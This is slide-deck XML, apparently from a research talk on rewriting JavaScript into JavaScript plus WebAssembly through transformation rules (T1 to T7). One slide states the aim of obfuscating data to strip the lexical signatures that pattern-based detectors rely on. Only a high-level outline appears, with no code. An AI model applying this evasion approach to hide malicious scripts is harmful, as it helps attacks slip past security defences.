                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="345"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="65" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="345"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="66" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="67" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="346"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="68" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="346"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="69" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="70" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="347"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="71" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="347"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="72" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="73" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="348"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="74" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="348"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="75" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="76" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="351"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="77" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="351"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="78" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="79" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="352"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="80" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="352"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="81" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="82" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="353"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="83" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="353"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="84" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="85" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="339"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="86" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="339"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="87" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="88" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="335"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="89" dur="5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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="182880"/>
            <a:ext cx="8520600" cy="820955"/>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Transformation Rule (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200" b="1" i="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200" b="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200" b="1" i="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>t, p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200" b="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="360" name="Google Shape;360;p36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="296400" y="1328366"/>
            <a:ext cx="8022000" cy="653700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="126986" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" b="1" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>A set of code locations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>where transformation may apply</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="361" name="Google Shape;361;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
        <p:nvSpPr>
          <p:cNvPr id="362" name="Google Shape;362;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1982075"/>
            <a:ext cx="8520600" cy="1187987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="126986" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" b="1" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>A transformation function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>maps JavaScript code to rewritten JavaScript + WebAssembly code</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="363" name="Google Shape;363;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311688" y="2960975"/>
            <a:ext cx="7991400" cy="978900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="126986" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" b="1" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>A precondition </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>expressed as a predicate on the code location and its surrounding context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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="10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7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="182880"/>
            <a:ext cx="8520600" cy="7398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Transformation Rules</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="369" name="Google Shape;369;p37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1092389"/>
            <a:ext cx="8370300" cy="3597600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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T1-StringLiteral</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T2-ArrayInitialization</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T3-FunctionName</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T4-CallExpression (a)</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T4-CallExpression (b)</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T5-IfStatement</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T6-ForStatement</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T7-WhileStatement</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="370" name="Google Shape;370;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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="371" name="Google Shape;371;p37"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2033800"/>
            <a:ext cx="2926200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="372" name="Google Shape;372;p37"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3302000"/>
            <a:ext cx="2926200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="373" name="Google Shape;373;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="1201756"/>
            <a:ext cx="4749900" cy="7794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0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Obfuscate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> to remove lexical signatures expected by pattern-based detectors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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="182880"/>
            <a:ext cx="8520600" cy="739933"/>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Transformation Rules</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="379" name="Google Shape;379;p38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1092389"/>
            <a:ext cx="8370184" cy="3597597"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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T1-StringLiteral</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T2-ArrayInitialization</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T3-FunctionName</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T4-CallExpression (a)</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T4-CallExpression (b)</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T5-IfStatement</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T6-ForStatement</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T7-WhileStatement</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="126986" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="380" name="Google Shape;380;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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="381" name="Google Shape;381;p38"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2032000"/>
            <a:ext cx="2926080" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="382" name="Google Shape;382;p38"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3302000"/>
            <a:ext cx="2926080" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="383" name="Google Shape;383;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="1201756"/>
            <a:ext cx="4749964" cy="77944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0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
